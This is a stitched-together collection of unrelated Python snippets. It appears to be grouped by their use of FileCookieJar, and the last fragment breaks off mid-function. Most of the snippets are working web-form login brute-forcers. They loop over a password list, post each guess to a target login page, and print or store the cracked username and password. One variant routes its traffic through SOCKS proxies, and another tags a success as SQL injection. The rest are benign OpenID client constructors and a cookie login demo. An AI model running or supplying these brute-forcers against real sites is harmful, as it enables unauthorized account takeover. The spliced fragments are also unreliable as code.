def webAuthCracker(q, username): global isBingo while not q.empty() and not isBingo: password = q.get().rstrip() cookies = cookielib.FileCookieJar('cookies') opener = build_opener(HTTPCookieProcessor(cookies)) res = opener.open(targeturl) htmlpage = res.read().decode() print('+++TRYING %s: %s' % (username, password)) parseR = myHTMLParser() parseR.feed(htmlpage) inputtags = parseR.tagResult inputtags[username_field] = username inputtags[pass_field] = password loginData = urlencode(inputtags).encode('utf-8') loginRes = opener.open(targetpost, data=loginData) loginResult = loginRes.read().decode() if check in loginResult: isBingo = True print('---CRACKING SUCCESS!') print('---Username[%s] Password[%s]' % (username, password)) print('---Waiting Other Threads Terminated..')
def web_bruter(self): while not self.password_q.empty() and not self.found: brute = self.password_q.get().rstrip() jar = cookielib.FileCookieJar("cookies") opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) response = opener.open(target_url) page = response.read() print("Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())) # parse out the hidden fields parser = BruteParser() parser.feed(page) post_tags = parser.tag_results # add our username and password fields post_tags[username_field] = self.username post_tags[password_field] = brute login_data = urllib.urlencode(post_tags) login_response = opener.open(target_post, login_data) login_result = login_response.read() if success_check in login_result: self.found = True print("[*] Bruteforce successful.") print("[*] Username: %s" % username) print("[*] Password: %s" % brute) print("[*] Waiting for other threads to exit...")
def web_bruter(self): while not self.password_q.empty() and not self.find: brute = self.password_q.get().decode().rstrip('\n') #去除字符串末尾的空格 jar = cookiejar.FileCookieJar("cookies") opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) response = opener.open(self.target_url) page = response.read() print("爆破用户:%s ------> 尝试密码:%s -------> 剩余密码数:%s" %(self.username,brute,self.password_q.qsize())) parser = BruteParser() parser.feed(page.decode()) #返回标签的集合 post_tags = parser.tag_results post_tags[username_tag] = self.username post_tags[password_tag] = brute # print post_tags login_data = urlencode(post_tags) login_response = opener.open(self.target_post,login_data.encode()) #print login_response.read() login_result = login_response.headers # 这个一部因目标而异 s_login_result = int(login_result["Content-Length"]) # print s_login_result # print login_result["Content-Length"] if s_login_result != 34: self.find = True # print login_result["Content-Length"] print("恭喜爆破成功!!!") print("用户名%s它的密码为:%s" %(self.username,brute)) print("等待爆破线程退出........") db = DB(self.target_url,self.username,brute) db.burstdb()
def __init__(self, options, submitted): self.options = options self.submitted = submitted self._maybe_down_message = 'Perhaps the connection was interupted or %s is down.' % self.options.site cookie_jar = cookiejar.FileCookieJar() urlrequest.install_opener( urlrequest.build_opener( urlrequest.HTTPCookieProcessor(cookie_jar)))
def __init__(self, verify_ssl=True, keyjar=None, client_cert=None, timeout=5): """ Initialize the instance. :param verify_ssl: Control TLS server certificate validation. If set to True the certificate is validated against the global settings, if set to False, no validation is performed. If set to a filename this is used as a certificate bundle in openssl format. If set to a directory name this is used as a CA directory in the openssl format. :param keyjar: A place to keep keys for signing/encrypting messages Creates a default keyjar if not set. :param client_cert: local cert to use as client side certificate, as a single file (containing the private key and the certificate) or as a tuple of both file's path :param timeout: Timeout for requests library. Can be specified either as a single integer or as a tuple of integers. For more details, refer to ``requests`` documentation. """ self.keyjar = keyjar or KeyJar(verify_ssl=verify_ssl) self.cookiejar = cookielib.FileCookieJar() # Additional args for the requests library calls self.request_args = { "allow_redirects": False, "cert": client_cert, "verify": verify_ssl, "timeout": timeout, } # Event collector, for tracing self.events = None self.req_callback = None
def webAuthCracker(username): password = '' cookies = cookielib.FileCookieJar('cookies') opener = build_opener(HTTPCookieProcessor(cookies)) res = opener.open(targeturl) htmlpage = res.read().decode() print('+++TRYING %s: %s' %(username, password)) parseR = myHTMLParser() parseR.feed(htmlpage) inputtags = parseR.tagResult inputtags[username_field] = username inputtags[pass_field] = password loginData = urlencode(inputtags).encode('utf-8') loginRes = opener.open(targetpost, data=loginData) loginResult = loginRes.read().decode() if check in loginResult: print('---CRACKING SUCCESS!') print('---SQL INJECTION [%s]' %username)
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): username_field = "username" password_field = "password" exit = 0 class BruteParser(HTMLParser): def __init__(self): HTMLParser.__init__(self) self.parsed_results = {} def handle_starttag(self, tag, attrs): if tag == "input": for name, value in attrs: if name == "name" and value == username_field: self.parsed_results[username_field] = username_field if name == "name" and value == password_field: self.parsed_results[password_field] = password_field if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0] socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]), int(socks_proxy.rsplit(':')[-1]), username=socks_username, password=socks_password) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo else: socks.set_default_proxy(socks_version, str( socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1])) socket.socket = socks.socksocket socket.getaddrinfo = getaddrinfo while 1: target_host = str(target) + ":" + str(port) flag = 1 try: cookiejar = cookiejar.FileCookieJar("cookies") opener = urllib2.build_opener( urllib2.HTTPCookieProcessor(cookiejar)) response = opener.open(target) page = response.read() parsed_html = BruteParser() parsed_html.feed(page) parsed_html.parsed_results[username_field] = user parsed_html.parsed_results[password_field] = passwd post_data = urllib.urlencode(parsed_html.parsed_results).encode() except: exit += 1 if exit is retries: warn(messages(language, "http_form_auth_failed").format( target, user, passwd, port)) return 1 else: time.sleep(time_sleep) continue try: if timeout_sec is not None: brute_force_response = opener.open( target_host, data=post_data, timeout=timeout_sec) else: brute_force_response = opener.open(target_host, data=post_data) if brute_force_response.code == 200: flag = 0 if flag is 0: info(messages(language, "http_form_auth_success").format( user, passwd, target, port)) data = json.dumps( {'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'http_form_brute', 'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) __log_into_file(thread_tmp_filename, 'w', '0', language) return flag except: exit += 1 if exit is retries: warn(messages(language, "http_form_auth_failed").format( target, user, passwd, port)) return 1 else: time.sleep(time_sleep) continue
def __init__( self, verify_ssl=None, keyjar=None, client_cert=None, timeout=None, settings: PyoidcSettings = None, ): """ Initialize the instance. Keyword Args: settings Instance of :class:`PyoidcSettings` with configuration options. Note that the following params are deprecated in favor of settings. :param verify_ssl: Control TLS server certificate validation. If set to True the certificate is validated against the global settings, if set to False, no validation is performed. If set to a filename this is used as a certificate bundle in openssl format. If set to a directory name this is used as a CA directory in the openssl format. :param keyjar: A place to keep keys for signing/encrypting messages Creates a default keyjar if not set. :param client_cert: local cert to use as client side certificate, as a single file (containing the private key and the certificate) or as a tuple of both file's path :param timeout: Timeout for requests library. Can be specified either as a single integer or as a tuple of integers. For more details, refer to ``requests`` documentation. """ self.settings = settings or PyoidcSettings() if verify_ssl is not None: warnings.warn( "`verify_ssl` is deprecated, please use `settings` instead if you need to set a non-default value.", DeprecationWarning, stacklevel=2, ) self.settings.verify_ssl = verify_ssl if client_cert is not None: warnings.warn( "`client_cert` is deprecated, please use `settings` instead if you need to set a non-default value.", DeprecationWarning, stacklevel=2, ) self.settings.client_cert = client_cert if timeout is not None: warnings.warn( "`timeout` is deprecated, please use `settings` instead if you need to set a non-default value.", DeprecationWarning, stacklevel=2, ) self.settings.timeout = timeout self.keyjar = keyjar or KeyJar(verify_ssl=self.settings.verify_ssl) self.cookiejar = cookielib.FileCookieJar() # Additional args for the requests library calls self.request_args = { "allow_redirects": False, "cert": self.settings.client_cert, "verify": self.settings.verify_ssl, "timeout": self.settings.timeout, } # Event collector, for tracing self.events = None self.req_callback = None
from urllib import request,parse from http import cookiejar # 创建cookie实例 cookie = cookiejar.CookieJar() file = cookiejar.FileCookieJar() mozilla = cookiejar.MozillaCookieJar() lwp = cookiejar.LWPCookieJar() # 创建cookie管理器 cookie_Headle = request.HTTPCookieProcessor(cookie) # 创建http请求管理器 http_Headle = request.HTTPHandler() # 生成https管理器 https_Headle = request.HTTPSHandler() # 创建请求管理器 oper = request.build_opener(http_Headle,https_Headle,cookie_Headle) ''' 进行登录操作 登录完成后,将请求返回的handle信息将由请求管理器保存,可以重复使用 在请求管理器生命周期结束后,所有的hanlder信息自动销毁 ''' def test01(url): data = { # 用户名,密码,验证码 "email":"*****@*****.**", "password":"******" # "icode":"" } try: